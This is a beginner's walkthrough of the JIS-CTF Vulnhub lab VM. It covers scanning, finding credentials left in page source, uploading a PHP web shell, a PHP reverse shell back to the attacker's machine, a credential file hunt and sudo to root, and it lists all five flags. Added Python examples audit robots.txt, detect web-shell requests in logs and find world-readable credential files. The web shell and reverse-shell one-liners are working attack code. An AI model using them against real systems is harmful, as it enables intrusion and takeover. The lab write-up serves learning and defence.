
JIS-CTF Walkthrough

JIS-CTF
WARNING: There will be spoilers to obtaining the 5 keys on JIS-CTF VM from Vulnhub. This is your warning! If you wish to penetration test this machine, do not scroll down much further.
General disclaimer: I am by no means an expert penetration tester nor do I have a lot of experience doing penetration testing. This walkthrough is from the perspective of an amateur who is trying to become better. The goal is for me to eventually take the OSCP. That being said, I had a bit of help from some colleagues from my company getting started but they by no means gave me the answers. I will be posting some of my hardships from a beginner perspective.

The JIS-CTF VM download from Vulnhub can be found here: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

The creator of this VM is Mohammad Khreesha

Here's the basic description:

Difficulty: Beginner

There are five flags on this machine. Try to find them. It takes 1.5 hours on average to find all flags.

Only working with VirtualBox

1. Service Enumeration

I always start off with an nmap scan of any system I am looking to attack. I usually use the same nmap command: nmap -A 192.168.1.25 -vvv -p1-65535. Let's break that down:

-A = Enable OS detection, version detection, script scanning, and traceroute
-p1-65535 = Port scan from 1 to 65535
-vvv = Extra verbose output.

Spoiler: Highlight to view

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-10 01:04 EST
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:04
Completed NSE at 01:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:04
Completed NSE at 01:04, 0.00s elapsed
Initiating ARP Ping Scan at 01:04
Scanning 192.168.1.25 [1 port]
Completed ARP Ping Scan at 01:04, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:04
Completed Parallel DNS resolution of 1 host. at 01:04, 0.03s elapsed
Initiating Connect Scan at 01:04
Scanning 192.168.1.25 [65535 ports]
Discovered open port 22/tcp on 192.168.1.25
Discovered open port 80/tcp on 192.168.1.25
Completed Connect Scan at 01:04, 3.39s elapsed (65535 total ports)
Initiating Service scan at 01:04
Scanning 2 services on 192.168.1.25
Completed Service scan at 01:05, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.25
NSE: Script scanning 192.168.1.25.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.23s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.00s elapsed
Nmap scan report for 192.168.1.25
Host is up, received arp-response (0.00024s latency).
Scanned at 2018-03-10 01:04:51 EST for 11s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMhxMikXNcV5fSVQOdDJd8pD0wcwgxing+sxhHlFLey4pROQlu4gq+rDlBlPUZm
|8i1DvKcbLU0B5TdLoLga2xEjh8039aQwDapzyUxQgGj62JGOtkIBG+ABZ8W8al8vMyznDrzCptsFP5wO90Bn/7TFB98ROpUs
|w/0NLrb|gEY25+xSreAlbuXZoDWmAo9q04AYkv70E+4uSumBrV+lULo/l6DPh|YcXZWj0E101b8P+Ta/Iyb2dEnVvRNz3NAdrg
|EoTfWUbi1mEnKH4pbf8SYGtwjOGtghZpuf8ouddwSJkK3uDp1EyK9kx2IROW5BzU7GoCvbhuEzk5Vbp1A55yGXn
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAwInAlaJjHZDOub+Y9MsG+uzczbUvQrH
|UfclhDDU3kw4nYQaK+T1UgKVEV4KetTUBrhlz5+GCAyLZluCxp0sKU=
|   256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAEcE9PBIBqFBfhTWXC4t9TDCicDwhJH3WahE9YoYPm5
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 8 disallowed entries
| / /backup /admin /admin_area /r00t /uploads
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=3/10%OT=22%CT=1%CU=40804%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5AA3758F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Uptime guess: 198.841 days (since Wed Aug 23 05:54:10 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.1.25

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
           Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)

Based on the above nmap scan output, there are 2 services running.

The first service is SSH as seen by the output:

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

I'm absolutely not an expert when it comes to attacking through SSH, and I'm fairly certain this isn't the proper attack vector. So I ended up ignoring the SSH scan information.

The other service we have running on this machine is a web service using Apache per the output:

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))

2. Web (Server/Service)

After nmap, I decided to bust out a tool called Nikto. It's pretty useful for gathering information about websites. The command and its output are below:

Spoiler: Highlight to view

nikto -host 192.168.1.25
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.25
+ Target Hostname:    192.168.1.25
+ Target Port:        80
+ Start Time:         2018-03-10 01:17:57 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0xa0 0x54d829805215a
+ Entry '/admin_area/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/uploaded_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 8 entries which should be manually viewed.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7544 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2018-03-10 01:18:10 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So looking at the results of our Nikto scan we found the following:

  • robots.txt
  • admin_area directory
  • uploaded_files directory
  • flag directory
  • login page

While Nikto was running, I had another tool that I recently learned about, Dirbuster, running simultaneously:

Spoiler: Highlight to view

[Screenshot: Dirbuster results]

Dirbuster confirms some of the findings we had from Nikto, but we found a number of other files based on the configurations we provided. We can see things like the Apache server status web page, a hint text file, flag text file, and much more.

I started with the robots.txt to see what might be in there and to confirm some of the Dirbuster/Nikto findings:

Spoiler: Highlight to view


User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag
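
The robots.txt above is a hint list for attackers as much as a hint for crawlers: a Disallow line does nothing to protect a path, it only advertises it. The script below is an added example written for this walkthrough (not code from the original post, nor from Nikto or Dirbuster) that reproduces the check Nikto performed: parse every Disallow entry and request each one, reporting those that still answer 200. The robots.txt text is a constructed copy of the one served by the VM, and fake_fetch is a constructed stand-in for an HTTP client whose responses mirror what the Nikto scan reported (three entries returned 200).

```python
"""Audit robots.txt Disallow entries: list them, then check whether each
path is actually protected or merely hidden from well-behaved crawlers.

Added example for this walkthrough, not code from the original post or
from Nikto/Dirbuster. ROBOTS_TXT is a constructed copy of the VM's file;
fake_fetch is a constructed stand-in for a real HTTP client.
"""
from typing import Callable, Dict, List

# Constructed copy of the robots.txt served by the VM (as shown in the scan output).
ROBOTS_TXT = """User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag
"""


def parse_disallow(text: str) -> List[str]:
    """Return the Disallow paths in file order, ignoring comments and blank lines."""
    paths = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop trailing comments
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        if field.lower() == "disallow" and value:
            paths.append(value)
    return paths


def audit_disallowed(paths: List[str], fetch: Callable[[str], int]) -> Dict[str, int]:
    """Request each disallowed path and return the ones that answered 200.

    A Disallow line only asks crawlers to stay away; anything that still
    returns 200 is reachable by anyone who reads the file.
    """
    exposed = {}
    for path in paths:
        if path == "/":
            continue                                  # the root redirect is expected
        status = fetch(path)
        if status == 200:
            exposed[path] = status
    return exposed


# Constructed responses (hypothetical) matching what the Nikto scan reported:
# three entries returned 200, everything else 404.
FAKE_RESPONSES = {"/admin_area": 200, "/uploaded_files": 200, "/flag": 200}


def fake_fetch(path: str) -> int:
    """Stand-in for an HTTP HEAD/GET; swap in a real client for a live check."""
    return FAKE_RESPONSES.get(path, 404)


def exposed_paths() -> List[str]:
    """Sorted list of disallowed paths that are still served with 200."""
    return sorted(audit_disallowed(parse_disallow(ROBOTS_TXT), fake_fetch))


if __name__ == "__main__":
    for path in exposed_paths():
        print(f"exposed: {path}")
```

For a live check, replace fake_fetch with a function that issues the request (urllib or requests) and returns the status code; the point of the split is that the parsing and the verdict can be tested without touching a network. Anything this reports should be locked down with access control or removed, not just delisted from robots.txt.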



Using some of the results returned from Dirbuster, I decided to try the flag.txt file but I received an access denied. The next thing I try to view is the hint.txt file, where I am presented with key #3 and information about a Linux user on the system called technawi, whose credentials are hidden in a text file somewhere on the server:

Spoiler: Highlight to view

3rd key

The 3rd key can be found under the key/flag section.

I then decided to start trying the disallowed directories in the robots.txt. Most of them appeared to not have anything interesting.

I enter the admin_area directory and all I see is this basic web page more or less saying go away nothing to see here. I tend to view the source code of any web page I visit where I ended up finding key #2, along with a username and password to what is hopefully the login credentials I need. I've included the source code but redacted the 2nd key. This can be found later in the walkthrough as well.

Spoiler: Highlight to view
<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : REDACTED
-->
</body>
</html>

Of course I save these credentials for later to see if they are indeed what I need. I proceed to work my way through the disallowed folders in robots.txt and I come upon the flag directory where I am presented with the 1st key. The key will be listed later in this walkthrough as well.

At this point I have keys #1 through #3, a set of credentials, a username to view a file, and the credentials for this username are hidden somewhere on the filesystem.

I visit the login page and enter the credentials I found for the 2nd key under the admin area where I am presented with a file upload web page: 

[Screenshot: file upload page]

3. Establish a foothold

At this point I create a basic PHP shell command page and upload it. The code used for the PHP basic "shell.php" is as follows:

Spoiler: Highlight to view
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Once I uploaded the shell, I checked the /uploaded_files/ for my shell.php file and sure enough it was there.

After uploading the shell script, I started to run netcat on my system on port 4444 using the command nc -lvp 4444.

I tried using my shell.php to call a python command that would give me a reverse shell but it didn't quite work out. My next attempt was to use the native php on the system to try and create a shell. For this I used a URL encoder at http://www.albionresearch.com/misc/urlencode.php and I gave it the following plaintext: php -r '$sock=fsockopen("Kali Box IP Address",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

The encoded output is as follows: php%20-r%20'%24sock%3Dfsockopen(%22192.168.1.29%22%2C4444)%3Bexec(%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B'

From there, I append the encoded output onto my basic shell command to http://Target_Box/uploaded_files/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.1.29%22%2C4444)%3Bexec(%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27
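
Every request to the uploaded shell leaves a line in Apache's access log, and the URL-encoded payload above decodes back to a recognisable one-liner. The script below is an added example written for this walkthrough (not code from the original post) showing how a defender would pick those requests out of a log: it parses combined-format lines, decodes the cmd parameter of any PHP file served from /uploaded_files/, and rates the hit as a plain command or a reverse-shell attempt based on a small indicator list. The log lines are constructed to mirror the shell.php?cmd=... request shown above; the indicator list and the upload directory are assumptions taken from this VM.

```python
"""Flag web-shell use in Apache access logs by decoding the cmd parameter
of requests to PHP files under the upload directory.

Added example for this walkthrough; the sample log lines are constructed
(not real captures) and mirror the shell.php?cmd=... request shown above.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: client, identd, user, [timestamp], "request line", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIR = "/uploaded_files/"   # where the upload form on this VM writes files (assumption)

# Substrings that seldom appear in a legitimate query string but do appear in
# reverse-shell one-liners (fsockopen and /bin/bash are in the payload above).
SHELL_INDICATORS = ("fsockopen", "/bin/bash", "/bin/sh", "bash -i", "nc ", "pty.spawn")

# Constructed sample log: two normal requests, a test command, the encoded
# reverse-shell request from above, and an unrelated file in the upload dir.
SAMPLE_LOG = """\
192.168.1.29 - - [10/Mar/2018:01:20:01 -0500] "GET /login.php HTTP/1.1" 200 1532
192.168.1.29 - - [10/Mar/2018:01:21:14 -0500] "POST /login.php HTTP/1.1" 302 0
192.168.1.29 - - [10/Mar/2018:01:22:40 -0500] "GET /uploaded_files/shell.php?cmd=id HTTP/1.1" 200 87
192.168.1.29 - - [10/Mar/2018:01:23:02 -0500] "GET /uploaded_files/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.1.29%22%2C4444)%3Bexec(%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27 HTTP/1.1" 200 0
192.168.1.29 - - [10/Mar/2018:01:24:11 -0500] "GET /uploaded_files/photo.jpg HTTP/1.1" 200 40211
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(entry: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding if the request drives a PHP file in the upload directory."""
    parts = urlsplit(entry["target"])
    if not (parts.path.startswith(UPLOAD_DIR) and parts.path.endswith(".php")):
        return None
    query = parse_qs(parts.query)            # percent-decodes each value
    if "cmd" not in query:
        return None
    command = query["cmd"][0]
    severity = "reverse-shell" if any(s in command for s in SHELL_INDICATORS) else "command"
    return {"ip": entry["ip"], "ts": entry["ts"], "path": parts.path,
            "command": command, "severity": severity}


def scan_log(text: str) -> List[Dict[str, str]]:
    """Run analyse() over every parseable line and collect the findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = analyse(entry)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['severity']:14} {f['path']} -> {f['command']}")
```

The decode step matters: grepping the raw log for "fsockopen" misses this request because the payload is percent-encoded, while matching on the decoded value catches it. In practice the detection should also cover POST bodies (not logged by default) and any PHP file appearing in an upload directory at all, since a writable upload directory that executes PHP is the root cause here.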

Basically at this point I have a basic reverse shell. I would prefer a more interactive shell so I use the following command to do so: python3 -c 'import pty; pty.spawn("/bin/bash")' 

I used python3 since the system actually did not have Python 2 installed.

We know about this "technawi" user. So I check out to see if technawi's home directory is accessible. Luckily enough it was.

[Screenshot: technawi's home directory]

"technawi" has a few global readable files being:

  • .bash_logout
  • .bashrc
  • .profile
  • .sudo_as_admin_successful
  • 1 (number one)

None of the files really seemed interesting once I looked into reading them. The "1" file was the Apache configuration, which didn't really give me anything I didn't already know. The .sudo_as_admin_successful file makes me think that technawi can use sudo commands, but I can look into that later once I have the credentials.

I remember back when I discovered key #3 that technawi's password is hidden somewhere on the file system.

Rabbit hole #1: I run some commands to find any and all hidden files on the file system using find ./ -name ".*" -print for technawi's home directory for grins and giggles. I shouldn't expect to see anything new from the above screenshot. So I widen my search with find / -name ".*" -print 2>/dev/null to the entire file system. I don't want to see any errors, so I send them to the garbage collector. Nothing of particular interest showed up.

So to get back on track: I just try searching the entire file system for text files using find / | grep txt. A bunch of things came up and this probably wasn't the expected way to find what I needed, but it worked out. I found a text file, /etc/mysql/conf.d/credentials.txt.

I have some experience when it comes to configuring MySQL services and this isn't a file you'd typically ever see. I output the contents to get key #4 along with technawi's password:
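
The credentials file was world-readable, which is why the www-data shell could read it at all. The script below is an added example written for this walkthrough (not code from the original post) that does the defensive version of the find / | grep txt hunt above: walk a directory tree, skip files that other users cannot read, and report the ones whose content looks like a "username : ..." / "password : ..." block. It builds a throwaway directory with constructed files so it runs offline; the layout imitates the credentials.txt found on the VM, but the password value is a labelled placeholder, and the field names in CRED_RE are assumptions.

```python
"""Find world-readable files that contain plaintext credentials.

Added example for this walkthrough, not code from the original post. The
fixture directory and its files are constructed; only the layout of
credentials.txt follows what was found on the VM.
"""
import os
import re
import shutil
import stat
import tempfile
from typing import List, Tuple

# Lines of the form "password : value" / "username = value" (assumed field names).
CRED_RE = re.compile(r"^\s*(username|password|passwd|pass)\s*[:=]\s*\S+",
                     re.IGNORECASE | re.MULTILINE)

MAX_BYTES = 64 * 1024      # config files are small; skip anything larger


def is_world_readable(path: str) -> bool:
    """True if the 'other' read bit is set, regardless of who runs the audit."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def find_credential_files(root: str, only_world_readable: bool = True) -> List[Tuple[str, str]]:
    """Return (path, matched-field) for files under root that look like credential stores."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > MAX_BYTES:
                    continue
                if only_world_readable and not is_world_readable(path):
                    continue
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue            # permission denied, vanished file, etc.
            m = CRED_RE.search(text)
            if m:
                hits.append((path, m.group(1).lower()))
    return sorted(hits)


def build_fixture() -> str:
    """Constructed tree: a leaked credentials file, a benign config, and a mode-600 secret."""
    root = tempfile.mkdtemp(prefix="credaudit_")
    conf_d = os.path.join(root, "etc", "mysql", "conf.d")
    os.makedirs(conf_d)

    leaked = os.path.join(conf_d, "credentials.txt")      # same layout as the VM's file
    with open(leaked, "w") as fh:
        fh.write("username : technawi\npassword : PLACEHOLDER_NOT_REAL\n")
    os.chmod(leaked, 0o644)

    benign = os.path.join(conf_d, "mysql.cnf")
    with open(benign, "w") as fh:
        fh.write("[mysqld]\nbind-address = 127.0.0.1\n")
    os.chmod(benign, 0o644)

    private = os.path.join(root, "etc", "private.txt")    # credential-like but not world-readable
    with open(private, "w") as fh:
        fh.write("password = PLACEHOLDER_NOT_REAL\n")
    os.chmod(private, 0o600)
    return root


def audit_fixture() -> List[str]:
    """Build the fixture, audit it, clean up; return hits as paths relative to the root."""
    root = build_fixture()
    try:
        return [os.path.relpath(p, root) for p, _ in find_credential_files(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel in audit_fixture():
        print(f"world-readable credentials: {rel}")
```

Run against /etc or a web root with only_world_readable=True and the output is exactly the set of files a low-privilege shell such as www-data could have read. The mode-600 file in the fixture is there to show the edge case: it contains a password too, but it is not the finding that matters for lateral movement, so the default filter leaves it out.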

Spoiler: Highlight to view

 

The 4th flag is : REDACTED

username : technawi
password : 3vilH@ksor
www-data@Jordaninfosec-CTF01:/var/www/html/admin_area$ 

Key #4 will be listed at the end with the rest.

I now have technawi's password and login as that user:

[Screenshot: logging in as technawi]

At this point I remember there was a text file called "flag.txt" in the root directory of the website which is only viewable by technawi. Cat'ing the file I got the 5th key:

Spoiler: Highlight to view

technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt
cat flag.txt
The 5th flag is : REDACTED

Good job :)

You find 5 flags and got their points and finish the first scenario....

4. Privilege Escalation

I have officially captured all the required keys for this VM based on what was said for it via vulnhub. This is definitely great and all, but as a penetration tester, you definitely want to own the box and get root.

I recall that technawi has a file in its home directory, .sudo_as_admin_successful, so I give the command sudo bash a shot to see if I get a root shell:

[Screenshot: root shell on JIS-CTF]

BAM. I have root.

That's it for this VM.

5. Flags/Keys

Flag #1: Found by performing a web scan like Dirbuster in the http://target_ip/flag/index.html page

Here's the actual flag:

Spoiler: Highlight to view
{8734509128730458630012095}

Flag #2: Found by performing a web scan like Dirbuster to get the http://target_ip/admin_area/ directory. From here you view the source code.

Here's the actual flag:

Spoiler: Highlight to view
{7412574125871236547895214}

Flag #3: Found in the hint.txt file in the root directory. This was found using Dirbuster.

Here's the actual flag:

Spoiler: Highlight to view
{7645110034526579012345670}

Flag #4: Found by scanning the file system for technawi's password. Found in the file /etc/mysql/conf.d/credentials.txt

Here's the actual flag:

Spoiler: Highlight to view
{7845658974123568974185412}

Flag #5: Found in a text file called flag.txt in the root directory of the website by using Dirbuster. Inaccessible until you become technawi

Here's the actual flag:

Spoiler: Highlight to view
{5473215946785213456975249}

There ya have it! The walkthrough of the JIS-CTF vulnhub VM. Please feel free to add any constructive feedback for any future walkthroughs I write up, tips for becoming a better pen tester, etc.